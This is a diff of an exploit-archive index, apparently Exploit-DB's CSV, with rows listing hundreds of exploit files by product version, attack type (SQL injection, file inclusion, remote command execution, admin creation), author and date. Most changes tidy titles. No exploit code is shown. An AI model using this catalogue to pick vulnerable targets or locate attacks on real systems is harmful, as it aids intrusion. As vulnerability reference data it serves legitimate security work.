40721,platforms/windows/remote/40721.html,"Microsoft Internet Explorer 8<11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)",2016-11-07,Skylined,windows,remote,0
40758,platforms/windows/remote/40758.rb,"Disk Pulse Enterprise - Login Buffer Overflow' (Metasploit)",2016-11-14,Metasploit,windows,remote,0
40734,platforms/hardware/remote/40734.sh,"MOVISTAR ADSL Router BHS_RTA - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
40735,platforms/hardware/remote/40735.txt,"D-Link ADSL Router DSL-2730U/2750U/2750E - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
40736,platforms/hardware/remote/40736.txt,"NETGEAR ADSL Router JNR1010 - Authenticated Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
@ -15883,7 +15880,7 @@ id,file,description,date,author,platform,type,port
1405,platforms/php/webapps/1405.pl,"FlatCMS 1.01 - (file_editor.php) Remote Command Execution",2006-01-04,cijfer,php,webapps,0
1410,platforms/php/webapps/1410.pl,"Magic News Plus 1.0.3 - Admin Pass Change Exploit",2006-01-09,cijfer,php,webapps,0
1418,platforms/asp/webapps/1418.txt,"MiniNuke 1.8.2 - Multiple SQL Injections",2006-01-14,nukedx,asp,webapps,0
1419,platforms/asp/webapps/1419.pl,"MiniNuke 1.8.2 - (news.asp hid) SQL Injection",2006-01-14,DetMyl,asp,webapps,0
1419,platforms/asp/webapps/1419.pl,"MiniNuke 1.8.2 - 'hid' Parameter SQL Injection",2006-01-14,DetMyl,asp,webapps,0
1442,platforms/php/webapps/1442.pl,"EZDatabase 2.0 - (db_id) Remote Command Execution",2006-01-22,cijfer,php,webapps,0
1446,platforms/php/webapps/1446.pl,"creLoaded 6.15 - (HTMLAREA) Automated Perl Exploit",2006-01-24,kaneda,php,webapps,0
1453,platforms/php/webapps/1453.pl,"Phpclanwebsite 1.23.1 - (par) SQL Injection",2006-01-25,matrix_killer,php,webapps,0
@ -15913,7 +15910,7 @@ id,file,description,date,author,platform,type,port
1511,platforms/php/webapps/1511.php,"Coppermine Photo Gallery 1.4.3 - Remote Commands Execution Exploit",2006-02-17,rgod,php,webapps,0
1512,platforms/php/webapps/1512.pl,"Admbook 1.2.2 - 'x-forwarded-for' Remote Command Execution",2006-02-19,rgod,php,webapps,0
1513,platforms/php/webapps/1513.php,"BXCP 0.2.9.9 - (tid) SQL Injection",2006-02-19,x128,php,webapps,0
1514,platforms/asp/webapps/1514.pl,"MiniNuke 1.8.2b - (pages.asp) SQL Injection",2006-02-19,nukedx,asp,webapps,0
1514,platforms/asp/webapps/1514.pl,"MiniNuke 1.8.2b - 'pages.asp' SQL Injection",2006-02-19,nukedx,asp,webapps,0
1515,platforms/php/webapps/1515.pl,"GeekLog 1.x - (error.log) Remote Commands Execution Exploit (gpc = Off)",2006-02-20,rgod,php,webapps,0
1516,platforms/php/webapps/1516.php,"ilchClan 1.05g - (tid) SQL Injection",2006-02-20,x128,php,webapps,0
1521,platforms/php/webapps/1521.php,"Noahs Classifieds 1.3 - (lowerTemplate) Remote Code Execution",2006-02-22,trueend5,php,webapps,0
@ -16097,7 +16094,7 @@ id,file,description,date,author,platform,type,port
1834,platforms/asp/webapps/1834.asp,"Easy-Content Forums 1.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities",2006-05-26,ajann,asp,webapps,0
1835,platforms/php/webapps/1835.txt,"Hot Open Tickets 11012004 - (CLASS_PATH) Remote File Inclusion",2006-05-27,Kacper,php,webapps,0
1836,platforms/asp/webapps/1836.txt,"PrideForum 1.0 - (forum.asp) SQL Injection",2006-05-27,ajann,asp,webapps,0
1837,platforms/asp/webapps/1837.pl,"MiniNuke 2.x - (create an admin) SQL Injection",2006-05-27,nukedx,asp,webapps,0
1837,platforms/asp/webapps/1837.pl,"MiniNuke 2.x - SQL Injection (Add Admin)",2006-05-27,nukedx,asp,webapps,0
1839,platforms/php/webapps/1839.txt,"tinyBB 0.3 - Remote File Inclusion / SQL Injection",2006-05-28,nukedx,php,webapps,0
1840,platforms/asp/webapps/1840.txt,"Enigma Haber 4.3 - Multiple SQL Injections",2006-05-28,nukedx,asp,webapps,0
1841,platforms/php/webapps/1841.txt,"F@cile Interactive Web 0.8x - Remote File Inclusion / Cross-Site Scripting",2006-05-28,nukedx,php,webapps,0
@ -16109,7 +16106,7 @@ id,file,description,date,author,platform,type,port
1847,platforms/php/webapps/1847.txt,"CosmicShoppingCart - 'search.php' SQL Injection",2006-05-28,Vympel,php,webapps,0
1848,platforms/php/webapps/1848.txt,"Fastpublish CMS 1.6.9 - config[fsBase] Remote File Inclusion",2006-05-29,Kacper,php,webapps,0
1849,platforms/asp/webapps/1849.htm,"Speedy ASP Forum - 'profileupdate.asp' User Pass Change Exploit",2006-05-29,ajann,asp,webapps,0
1850,platforms/asp/webapps/1850.htm,"Nukedit CMS 4.9.6 - Unauthorized Admin Add Exploit",2006-05-29,FarhadKey,asp,webapps,0
1850,platforms/asp/webapps/1850.htm,"Nukedit CMS 4.9.6 - Unauthorized Admin Add",2006-05-29,FarhadKey,asp,webapps,0
1851,platforms/php/webapps/1851.txt,"gnopaste 0.5.3 - 'common.php' Remote File Inclusion",2006-05-30,SmokeZ,php,webapps,0
1853,platforms/php/webapps/1853.php,"pppBlog 0.3.8 - (randompic.php) System Disclosure",2006-05-31,rgod,php,webapps,0
1854,platforms/php/webapps/1854.txt,"Ottoman CMS 1.1.3 - '?default_path=' Remote File Inclusion (1)",2006-05-31,Kacper,php,webapps,0
@ -17109,7 +17106,7 @@ id,file,description,date,author,platform,type,port
3246,platforms/php/webapps/3246.txt,"phpEventMan 1.0.2 - (level) Remote File Inclusion",2007-02-01,"Mehmet Ince",php,webapps,0
3247,platforms/php/webapps/3247.txt,"Epistemon 1.0 - (common.php inc_path) Remote File Inclusion",2007-02-01,GoLd_M,php,webapps,0
3249,platforms/php/webapps/3249.txt,"WebBuilder 2.0 - (StageLoader.php) Remote File Inclusion",2007-02-01,GoLd_M,php,webapps,0
3250,platforms/php/webapps/3250.txt,"Portail Web PHP 2.5.1 - (includes.php) Remote File Inclusion",2007-02-01,"laurent gaffié",php,webapps,0
3250,platforms/php/webapps/3250.txt,"Portail Web PHP 2.5.1 - 'includes.php' Remote File Inclusion",2007-02-01,"laurent gaffié",php,webapps,0
3251,platforms/php/webapps/3251.txt,"CoD2: DreamStats 4.2 - 'index.php' Remote File Inclusion",2007-02-02,"ThE dE@Th",php,webapps,0
3252,platforms/php/webapps/3252.txt,"EQdkp 1.3.1 - (Referer Spoof) Remote Database Backup",2007-02-02,Eight10,php,webapps,0
3253,platforms/php/webapps/3253.txt,"Flipper Poll 1.1.0 - (poll.php root_path) Remote File Inclusion",2007-02-02,"Mehmet Ince",php,webapps,0
@ -17384,13 +17381,13 @@ id,file,description,date,author,platform,type,port
3706,platforms/php/webapps/3706.txt,"Mambo Component zOOm Media Gallery 2.5 Beta 2 - Remote File Inclusion",2007-04-11,iskorpitx,php,webapps,0
3707,platforms/php/webapps/3707.txt,"TOSMO/Mambo 1.4.13a - 'absolute_path' Remote File Inclusion",2007-04-11,"Cold Zero",php,webapps,0
3710,platforms/php/webapps/3710.php,"PunBB 1.2.14 - Remote Code Execution",2007-04-11,DarkFig,php,webapps,0
3711,platforms/php/webapps/3711.htm,"CodeBreak 1.1.2 - (codebreak.php) Remote File Inclusion",2007-04-11,"John Martinelli",php,webapps,0
3712,platforms/php/webapps/3712.txt,"Mambo Module Weather - 'absolute_path' Remote File Inclusion",2007-04-11,"Cold Zero",php,webapps,0
3711,platforms/php/webapps/3711.htm,"CodeBreak 1.1.2 - 'codebreak.php' Remote File Inclusion",2007-04-11,"John Martinelli",php,webapps,0
3712,platforms/php/webapps/3712.txt,"Mambo Module Weather - 'absolute_path' Parameter Remote File Inclusion",2007-04-11,"Cold Zero",php,webapps,0
3713,platforms/php/webapps/3713.txt,"Mambo Module Calendar (Agenda) 1.5.5 - Remote File Inclusion",2007-04-11,"Cold Zero",php,webapps,0
3714,platforms/php/webapps/3714.txt,"Joomla! Component mosmedia 1.0.8 - Remote File Inclusion",2007-04-11,GoLd_M,php,webapps,0
3716,platforms/php/webapps/3716.pl,"mxBB Module MX Shotcast 1.0 RC2 - (getinfo1.php) Remote File Inclusion",2007-04-12,bd0rk,php,webapps,0
3716,platforms/php/webapps/3716.pl,"mxBB Module MX Shotcast 1.0 RC2 - 'getinfo1.php' Remote File Inclusion",2007-04-12,bd0rk,php,webapps,0
3717,platforms/php/webapps/3717.txt,"WebKalk2 1.9.0 - 'absolute_path' Remote File Inclusion",2007-04-12,GoLd_M,php,webapps,0
3718,platforms/php/webapps/3718.txt,"RicarGBooK 1.2.1 - (header.php lang) Local File Inclusion",2007-04-12,Dj7xpl,php,webapps,0
3718,platforms/php/webapps/3718.txt,"RicarGBooK 1.2.1 - 'lang' Parameter Local File Inclusion",2007-04-12,Dj7xpl,php,webapps,0
3719,platforms/php/webapps/3719.pl,"MyBulletinBoard (MyBB) 1.2.2 - 'CLIENT-IP' SQL Injection",2007-04-12,Elekt,php,webapps,0
3721,platforms/php/webapps/3721.pl,"e107 0.7.8 - (mailout.php) Access Escalation Exploit (Admin needed)",2007-04-12,Gammarays,php,webapps,0
3722,platforms/php/webapps/3722.txt,"Expow 0.8 - (autoindex.php cfg_file) Remote File Inclusion",2007-04-12,mdx,php,webapps,0
@ -18236,7 +18233,7 @@ id,file,description,date,author,platform,type,port
5039,platforms/php/webapps/5039.txt,"WordPress Plugin Wordspew - SQL Injection",2008-02-02,S@BUN,php,webapps,0
5040,platforms/php/webapps/5040.txt,"BookmarkX script 2007 - 'topicid' Parameter SQL Injection",2008-02-02,S@BUN,php,webapps,0
5041,platforms/php/webapps/5041.txt,"phpShop 0.8.1 - SQL Injection / Filter Bypass",2008-02-02,"the redc0ders",php,webapps,0
5042,platforms/php/webapps/5042.txt,"BlogPHP 2 - 'id' Cross-Site Scripting / SQL Injection",2008-02-02,"Khashayar Fereidani",php,webapps,0
5042,platforms/php/webapps/5042.txt,"BlogPHP 2 - 'id' Parameter Cross-Site Scripting / SQL Injection",2008-02-02,"Khashayar Fereidani",php,webapps,0
5047,platforms/php/webapps/5047.txt,"Joomla! Component mosDirectory 2.3.2 - 'catid' Parameter SQL Injection",2008-02-03,GoLd_M,php,webapps,0
5050,platforms/php/webapps/5050.pl,"A-Blog 2.0 - Cross-Site Scripting / SQL Injection",2008-02-03,"Khashayar Fereidani",php,webapps,0
5053,platforms/php/webapps/5053.txt,"WordPress Plugin st_newsletter - SQL Injection",2008-02-03,S@BUN,php,webapps,0
@ -18324,39 +18321,39 @@ id,file,description,date,author,platform,type,port
5163,platforms/php/webapps/5163.txt,"PHP-Nuke Module Inhalt - 'cid' Parameter SQL Injection",2008-02-20,Crackers_Child,php,webapps,0
5164,platforms/php/webapps/5164.php,"Woltlab Burning Board 3.0.x - Blind SQL Injection",2008-02-20,NBBN,php,webapps,0
5165,platforms/php/webapps/5165.php,"PunBB 1.2.16 - Blind Password Recovery Exploit",2008-02-21,EpiBite,php,webapps,0
5166,platforms/php/webapps/5166.htm,"MultiCart 2.0 - (productdetails.php) SQL Injection",2008-02-20,t0pP8uZz,php,webapps,0
5168,platforms/php/webapps/5168.txt,"PHP-Nuke Modules Manuales 0.1 - 'cid' SQL Injection",2008-02-21,"Mehmet Ince",php,webapps,0
5169,platforms/php/webapps/5169.txt,"PHP-Nuke Module Siir - 'id' SQL Injection",2008-02-21,S@BUN,php,webapps,0
5166,platforms/php/webapps/5166.htm,"MultiCart 2.0 - 'productdetails.php' SQL Injection",2008-02-20,t0pP8uZz,php,webapps,0
5168,platforms/php/webapps/5168.txt,"PHP-Nuke Modules Manuales 0.1 - 'cid' Parameter SQL Injection",2008-02-21,"Mehmet Ince",php,webapps,0
5169,platforms/php/webapps/5169.txt,"PHP-Nuke Module Siir - 'id' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0
5170,platforms/php/webapps/5170.txt,"BeContent 031 - 'id' SQL Injection",2008-02-21,Cr@zy_King,php,webapps,0
5171,platforms/php/webapps/5171.txt,"OSSIM 0.9.9rc5 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-02-21,"Marcin Kopec",php,webapps,0
5172,platforms/php/webapps/5172.txt,"PHP-Nuke Module NukeC 2.1 - (id_catg) SQL Injection",2008-02-21,DamaR,php,webapps,0
5171,platforms/php/webapps/5171.txt,"OSSIM 0.9.9rc5 - Cross-Site Scripting / SQL Injection",2008-02-21,"Marcin Kopec",php,webapps,0
5172,platforms/php/webapps/5172.txt,"PHP-Nuke Module NukeC 2.1 - 'id_catg' Parameter SQL Injection",2008-02-21,DamaR,php,webapps,0
5173,platforms/php/webapps/5173.txt,"phpQLAdmin 2.2.7 - Multiple Remote File Inclusion",2008-02-22,RoMaNcYxHaCkEr,php,webapps,0
5174,platforms/php/webapps/5174.txt,"Quantum Game Library 0.7.2c - Remote File Inclusion",2008-02-22,RoMaNcYxHaCkEr,php,webapps,0
5175,platforms/php/webapps/5175.txt,"PHPProfiles 4.5.2 Beta - (body_comm.inc.php) Remote File Inclusion",2008-02-23,CraCkEr,php,webapps,0
5175,platforms/php/webapps/5175.txt,"PHPProfiles 4.5.2 Beta - 'body_comm.inc.php' Remote File Inclusion",2008-02-23,CraCkEr,php,webapps,0
5176,platforms/php/webapps/5176.txt,"Quinsonnas Mail Checker 1.55 - (footer.php) Remote File Inclusion",2008-02-23,GoLd_M,php,webapps,0
5177,platforms/php/webapps/5177.txt,"Joomla! Component simple shop 2.0 - SQL Injection",2008-02-23,S@BUN,php,webapps,0
5178,platforms/php/webapps/5178.txt,"Mambo Component garyscookbook 1.1.1 - SQL Injection",2008-02-23,S@BUN,php,webapps,0
5179,platforms/php/webapps/5179.txt,"PHPUserBase 1.3b - (unverified.inc.php) Local File Inclusion",2008-02-23,BeyazKurt,php,webapps,0
5180,platforms/php/webapps/5180.txt,"PHPUserBase 1.3b - (unverified.inc.php) Remote File Inclusion",2008-02-24,CraCkEr,php,webapps,0
5179,platforms/php/webapps/5179.txt,"PHPUserBase 1.3b - 'unverified.inc.php' Local File Inclusion",2008-02-23,BeyazKurt,php,webapps,0
5180,platforms/php/webapps/5180.txt,"PHPUserBase 1.3b - 'unverified.inc.php' Remote File Inclusion",2008-02-24,CraCkEr,php,webapps,0
5181,platforms/php/webapps/5181.txt,"pigyard art Gallery - Multiple Vulnerabilities",2008-02-24,ZoRLu,php,webapps,0
5182,platforms/php/webapps/5182.txt,"Portail Web PHP 2.5.1.1 - Multiple Inclusion Vulnerabilities",2008-02-24,GoLd_M,php,webapps,0
5183,platforms/php/webapps/5183.txt,"PHP Download Manager 1.1 - Local File Inclusion",2008-02-24,BeyazKurt,php,webapps,0
5185,platforms/asp/webapps/5185.txt,"PORAR WebBoard - 'question.asp' SQL Injection",2008-02-25,xcorpitx,asp,webapps,0
5186,platforms/php/webapps/5186.txt,"PHP-Nuke Module Kose_Yazilari - (artid) SQL Injection",2008-02-25,xcorpitx,php,webapps,0
5187,platforms/asp/webapps/5187.txt,"MiniNuke 2.1 - (members.asp uid) SQL Injection",2008-02-25,S@BUN,asp,webapps,0
5186,platforms/php/webapps/5186.txt,"PHP-Nuke Module Kose_Yazilari - 'artid' Parameter SQL Injection",2008-02-25,xcorpitx,php,webapps,0
5187,platforms/asp/webapps/5187.txt,"MiniNuke 2.1 - 'uid' Parameter SQL Injection",2008-02-25,S@BUN,asp,webapps,0
5189,platforms/php/webapps/5189.pl,"DBHcms 1.1.4 - Remote File Inclusion",2008-02-25,Iron,php,webapps,0
5192,platforms/php/webapps/5192.pl,"Nukedit 4.9.x - Remote Create Admin Exploit",2008-02-26,r3dm0v3,php,webapps,0
5194,platforms/php/webapps/5194.txt,"WordPress Plugin Sniplets 1.1.2 - (Remote File Inclusion / Cross-Site Scripting / Remote Code Execution) Multiple Vulnerabilities",2008-02-26,NBBN,php,webapps,0
5195,platforms/php/webapps/5195.txt,"Mambo Component SimpleBoard 1.0.3 - 'catid' SQL Injection",2008-02-27,"it's my",php,webapps,0
5192,platforms/php/webapps/5192.pl,"Nukedit 4.9.x - Remote Create Admin",2008-02-26,r3dm0v3,php,webapps,0
5194,platforms/php/webapps/5194.txt,"WordPress Plugin Sniplets 1.1.2 - Remote File Inclusion / Cross-Site Scripting / Remote Code Execution",2008-02-26,NBBN,php,webapps,0
5195,platforms/php/webapps/5195.txt,"Mambo Component SimpleBoard 1.0.3 - 'catid' Parameter SQL Injection",2008-02-27,"it's my",php,webapps,0
5196,platforms/php/webapps/5196.pl,"eazyPortal 1.0 - 'cookie' SQL Injection",2008-02-27,Iron,php,webapps,0
5197,platforms/php/webapps/5197.txt,"GROUP-E 1.6.41 - (head_auth.php) Remote File Inclusion",2008-02-27,CraCkEr,php,webapps,0
5198,platforms/php/webapps/5198.txt,"Koobi Pro 5.7 - (categ) SQL Injection",2008-02-28,Cr@zy_King,php,webapps,0
5197,platforms/php/webapps/5197.txt,"GROUP-E 1.6.41 - 'head_auth.php' Remote File Inclusion",2008-02-27,CraCkEr,php,webapps,0
5198,platforms/php/webapps/5198.txt,"Dream4 Koobi Pro 5.7 - 'categ' Parameter SQL Injection",2008-02-28,Cr@zy_King,php,webapps,0
5199,platforms/php/webapps/5199.txt,"SiteBuilderElite 1.2 - Multiple Remote File Inclusion",2008-02-28,MhZ91,php,webapps,0
5200,platforms/php/webapps/5200.txt,"Podcast Generator 1.0 Beta 2 - Remote File Inclusion / File Disclosure",2008-02-28,GoLd_M,php,webapps,0
5202,platforms/php/webapps/5202.txt,"barryvan compo manager 0.5pre-1 - Remote File Inclusion",2008-02-28,MhZ91,php,webapps,0
5203,platforms/php/webapps/5203.txt,"PHP-Nuke My_eGallery 2.7.9 - SQL Injection",2008-02-28,"Aria-Security Team",php,webapps,0
5204,platforms/php/webapps/5204.py,"Centreon 1.4.2.3 - (get_image.php) Remote File Disclosure",2008-02-28,"Julien CAYSSOL",php,webapps,0
5206,platforms/php/webapps/5206.txt,"Koobi CMS 4.3.0 < 4.2.3 - (categ) SQL Injection",2008-02-29,JosS,php,webapps,0
5202,platforms/php/webapps/5202.txt,"Barryvan Compo Manager 0.3 - Remote File Inclusion",2008-02-28,MhZ91,php,webapps,0
5203,platforms/php/webapps/5203.txt,"PHP-Nuke Module My_eGallery 2.7.9 - SQL Injection",2008-02-28,"Aria-Security Team",php,webapps,0
5204,platforms/php/webapps/5204.py,"Centreon 1.4.2.3 - 'get_image.php' Remote File Disclosure",2008-02-28,"Julien CAYSSOL",php,webapps,0
5206,platforms/php/webapps/5206.txt,"Dream4 Koobi CMS 4.3.0 < 4.2.3 - 'categ' Parameter SQL Injection",2008-02-29,JosS,php,webapps,0
5207,platforms/php/webapps/5207.txt,"Mambo Component com_Musica - 'id' SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0
5208,platforms/php/webapps/5208.txt,"phpArcadeScript 3.0RC2 - (userid) SQL Injection",2008-03-01,"SoSo H H",php,webapps,0
5209,platforms/php/webapps/5209.txt,"phpComasy 0.8 - (mod_project_id) SQL Injection",2008-03-01,Cr@zy_King,php,webapps,0
@ -18499,11 +18496,11 @@ id,file,description,date,author,platform,type,port
5408,platforms/php/webapps/5408.pl,"LokiCMS 0.3.3 - Remote Command Execution",2008-04-08,girex,php,webapps,0
5409,platforms/asp/webapps/5409.txt,"SuperNET Shop 1.0 - SQL Injection",2008-04-08,U238,asp,webapps,0
5410,platforms/php/webapps/5410.txt,"Prediction Football 1.x - (matchid) SQL Injection",2008-04-08,0in,php,webapps,0
5411,platforms/php/webapps/5411.txt,"Koobi Pro 6.25 - links SQL Injection",2008-04-08,S@BUN,php,webapps,0
5412,platforms/php/webapps/5412.txt,"Koobi Pro 6.25 - shop SQL Injection",2008-04-08,S@BUN,php,webapps,0
5413,platforms/php/webapps/5413.txt,"Koobi Pro 6.25 - gallery SQL Injection",2008-04-08,S@BUN,php,webapps,0
5414,platforms/php/webapps/5414.txt,"Koobi Pro 6.25 - showimages SQL Injection",2008-04-08,S@BUN,php,webapps,0
5415,platforms/php/webapps/5415.txt,"Koobi 4.4/5.4 - gallery SQL Injection",2008-04-08,S@BUN,php,webapps,0
5411,platforms/php/webapps/5411.txt,"Dream4 Koobi Pro 6.25 Links - 'categ' Parameter SQL Injection",2008-04-08,S@BUN,php,webapps,0
5412,platforms/php/webapps/5412.txt,"Dream4 Koobi Pro 6.25 Shop - 'categ' Parameter SQL Injection",2008-04-08,S@BUN,php,webapps,0
5413,platforms/php/webapps/5413.txt,"Dream4 Koobi Pro 6.25 Gallery - 'galid' Parameter SQL Injection",2008-04-08,S@BUN,php,webapps,0
5414,platforms/php/webapps/5414.txt,"Dream4 Koobi Pro 6.25 Showimages - 'galid' Parameter SQL Injection",2008-04-08,S@BUN,php,webapps,0
5415,platforms/php/webapps/5415.txt,"Dream4 Koobi 4.4/5.4 - gallery SQL Injection",2008-04-08,S@BUN,php,webapps,0
5417,platforms/php/webapps/5417.htm,"phpBB Addon Fishing Cat Portal - Remote File Inclusion",2008-04-09,bd0rk,php,webapps,0
5418,platforms/php/webapps/5418.pl,"KnowledgeQuest 2.5 - Arbitrary Add Admin",2008-04-09,t0pP8uZz,php,webapps,0
5419,platforms/php/webapps/5419.txt,"Free Photo Gallery Site Script - (path) File Disclosure",2008-04-09,JIKO,php,webapps,0
@ -18528,8 +18525,8 @@ id,file,description,date,author,platform,type,port
5443,platforms/php/webapps/5443.txt,"SmallBiz eShop - (content_id) SQL Injection",2008-04-14,Stack,php,webapps,0
5444,platforms/php/webapps/5444.txt,"BosClassifieds 3.0 - (index.php cat) SQL Injection",2008-04-14,"SoSo H H",php,webapps,0
5446,platforms/php/webapps/5446.txt,"BosNews 4.0 - (article) SQL Injection",2008-04-14,Crackers_Child,php,webapps,0
5447,platforms/php/webapps/5447.txt,"Koobi CMS 4.2.4/4.2.5/4.3.0 - Multiple SQL Injections",2008-04-14,JosS,php,webapps,0
5448,platforms/php/webapps/5448.txt,"Koobi Pro 6.25 - poll SQL Injection",2008-04-14,S@BUN,php,webapps,0
5447,platforms/php/webapps/5447.txt,"Dream4 Koobi CMS 4.2.4/4.2.5/4.3.0 - Multiple SQL Injections",2008-04-14,JosS,php,webapps,0
5448,platforms/php/webapps/5448.txt,"Dream4 Koobi Pro 6.25 Poll - 'poll_id' Parameter SQL Injection",2008-04-14,S@BUN,php,webapps,0
5449,platforms/php/webapps/5449.php,"KwsPHP - (Upload) Remote Code Execution",2008-04-14,Ajax,php,webapps,0
5450,platforms/php/webapps/5450.txt,"Classifieds Caffe - 'index.php cat_id' SQL Injection",2008-04-15,JosS,php,webapps,0
5452,platforms/php/webapps/5452.txt,"lightneasy sqlite / no database 1.2.2 - Multiple Vulnerabilities",2008-04-15,girex,php,webapps,0
@ -20972,7 +20969,7 @@ id,file,description,date,author,platform,type,port
8857,platforms/php/webapps/8857.txt,"WebCal - 'webCal3_detail.asp event_id' SQL Injection",2009-06-02,Bl@ckbe@rD,php,webapps,0
8858,platforms/php/webapps/8858.txt,"propertymax pro free - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-06-02,SirGod,php,webapps,0
8859,platforms/asp/webapps/8859.txt,"WebEyes Guest Book 3 - 'yorum.asp mesajid' SQL Injection",2009-06-02,Bl@ckbe@rD,asp,webapps,0
8860,platforms/php/webapps/8860.txt,"Podcast Generator 1.2 - GLOBALS[] Multiple Vulnerabilities",2009-06-02,StAkeR,php,webapps,0
8860,platforms/php/webapps/8860.txt,"Podcast Generator 1.2 - 'GLOBALS[]' Multiple Vulnerabilities",2009-06-02,StAkeR,php,webapps,0
8864,platforms/php/webapps/8864.txt,"My Mini Bill - (orderid) SQL Injection",2009-06-03,"ThE g0bL!N",php,webapps,0
8865,platforms/php/webapps/8865.txt,"EgyPlus 7ml 1.0.1 - (Authentication Bypass) SQL Injection",2009-06-03,Qabandi,php,webapps,0
8866,platforms/php/webapps/8866.php,"Podcast Generator 1.2 - Unauthorized Re-Installation Remote Exploit",2009-06-03,StAkeR,php,webapps,0
@ -21911,7 +21908,7 @@ id,file,description,date,author,platform,type,port
10712,platforms/php/webapps/10712.txt,"Nuked-klaN SP4 - Remote File Inclusion",2009-12-26,indoushka,php,webapps,0
10713,platforms/asp/webapps/10713.txt,"Esinti Web Design Gold Defter - Database Disclosure",2009-12-26,LionTurk,asp,webapps,0
10716,platforms/php/webapps/10716.txt,"Datenator 0.3.0 - (event.php id) SQL Injection",2009-12-26,The_HuliGun,php,webapps,0
10717,platforms/php/webapps/10717.txt,"DBHCMS Web Content Management System 1.1.4 - Remote File Inclusion",2009-12-26,Gamoscu,php,webapps,0
10717,platforms/php/webapps/10717.txt,"DBHcms 1.1.4 - Remote File Inclusion",2009-12-26,Gamoscu,php,webapps,0
10718,platforms/php/webapps/10718.txt,"ta3arof [dating] Script (Arabic Version) - Arbitrary File Upload",2009-12-26,indoushka,php,webapps,0
10719,platforms/php/webapps/10719.txt,"PHP Uploader Downloader 2.0 - Arbitrary File Upload",2009-12-26,indoushka,php,webapps,0
10720,platforms/php/webapps/10720.txt,"PHP Football 1.0 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0
@ -21937,7 +21934,7 @@ id,file,description,date,author,platform,type,port
10742,platforms/php/webapps/10742.txt,"Joomla! Component com_dhforum - SQL Injection",2009-12-27,ViRuSMaN,php,webapps,0
10743,platforms/php/webapps/10743.txt,"phPay 2.2a - Backup",2009-12-26,indoushka,php,webapps,0
10750,platforms/php/webapps/10750.txt,"Mambo Component 'com_materialsuche' 1.0 - SQL Injection",2009-12-27,Gamoscu,php,webapps,0
10751,platforms/php/webapps/10751.txt,"Koobi Pro 6.1 - Gallery (img_id)",2009-12-27,BILGE_KAGAN,php,webapps,0
10751,platforms/php/webapps/10751.txt,"Dream4 Koobi Pro 6.1 Gallery - 'img_id' Parameter SQL Injection",2009-12-27,BILGE_KAGAN,php,webapps,0
10752,platforms/multiple/webapps/10752.txt,"Yonja - Arbitrary File Upload",2009-12-28,indoushka,multiple,webapps,80
10753,platforms/multiple/webapps/10753.txt,"ASP Simple Blog 3.0 - Arbitrary File Upload",2009-12-28,indoushka,multiple,webapps,80
10754,platforms/multiple/webapps/10754.txt,"Joomla! Component com_if_nexus - Remote File Inclusion",2009-12-28,FL0RiX,multiple,webapps,80
@ -22953,7 +22950,7 @@ id,file,description,date,author,platform,type,port
12489,platforms/php/webapps/12489.txt,"Joomla! 1.6.0-Alpha2 - Cross-Site Scripting",2010-05-03,mega-itec.com,php,webapps,0
14025,platforms/php/webapps/14025.txt,"2DayBiz Job Site Script - SQL Injection",2010-06-24,Sangteamtham,php,webapps,0
12496,platforms/php/webapps/12496.html,"KubeBlog - Cross-Site Request Forgery",2010-05-03,The.Morpheus,php,webapps,0
12499,platforms/php/webapps/12499.txt,"dbhcms 1.1.4 - Persistent Cross-Site Scripting",2010-05-04,ITSecTeam,php,webapps,0
12499,platforms/php/webapps/12499.txt,"DBHcms 1.1.4 - Persistent Cross-Site Scripting",2010-05-04,ITSecTeam,php,webapps,0
12500,platforms/php/webapps/12500.txt,"Clicksor - SQL Injection",2010-05-04,JM511,php,webapps,0
12504,platforms/php/webapps/12504.txt,"thEngine 0.1 - Local File Inclusion",2010-05-04,team_elite,php,webapps,0
12506,platforms/php/webapps/12506.php,"Knowledgeroot (fckeditor) - Arbitrary File Upload",2010-05-04,eidelweiss,php,webapps,0
@ -23938,7 +23935,7 @@ id,file,description,date,author,platform,type,port
15310,platforms/php/webapps/15310.py,"Jamb - Cross-Site Request Forgery (Add a Post)",2010-10-25,Stoke,php,webapps,0
15313,platforms/php/webapps/15313.txt,"Plesk Small Business Manager 10.2.0 and Site Editor - Multiple Vulnerabilities",2010-10-25,"David Hoyt",php,webapps,0
15320,platforms/php/webapps/15320.py,"BigACE 2.7.3 - Cross-Site Request Forgery (Change Admin Password) (PoC)",2010-10-26,Sweet,php,webapps,0
15321,platforms/php/webapps/15321.txt,"DBHcms 1.1.4 (dbhcms_user and SearchString) - SQL Injection",2010-10-27,"High-Tech Bridge SA",php,webapps,0
15321,platforms/php/webapps/15321.txt,"DBHcms 1.1.4 - 'dbhcms_user/SearchString' Parameter SQL Injection",2010-10-27,"High-Tech Bridge SA",php,webapps,0
15322,platforms/php/webapps/15322.txt,"phpLiterAdmin 1.0 RC1 - Authentication Bypass",2010-10-27,"High-Tech Bridge SA",php,webapps,0
15323,platforms/php/webapps/15323.txt,"DZCP (deV!L_z Clanportal) 1.5.4 - Local File Inclusion",2010-10-27,"High-Tech Bridge SA",php,webapps,0
15324,platforms/php/webapps/15324.txt,"Novaboard 1.1.4 - Local File Inclusion",2010-10-27,"High-Tech Bridge SA",php,webapps,0
@ -24293,7 +24290,7 @@ id,file,description,date,author,platform,type,port
16097,platforms/php/webapps/16097.txt,"Zikula CMS 1.2.4 - Cross-Site Request Forgery",2011-02-02,"Aung Khant",php,webapps,0
16102,platforms/php/webapps/16102.txt,"Islam Sound IV2 - 'details.php' SQL Injection",2011-02-03,ZxH-Labs,php,webapps,0
16106,platforms/php/webapps/16106.txt,"OemPro 3.6.4 - Multiple Vulnerabilities",2011-02-03,"Ignacio Garrido",php,webapps,0
16109,platforms/php/webapps/16109.txt,"podcast generator 1.3 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",php,webapps,0
16109,platforms/php/webapps/16109.txt,"Podcast Generator 1.3 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",php,webapps,0
16113,platforms/php/webapps/16113.txt,"osCommerce - Authentication Bypass",2011-02-04,"Nicolas Krassas",php,webapps,0
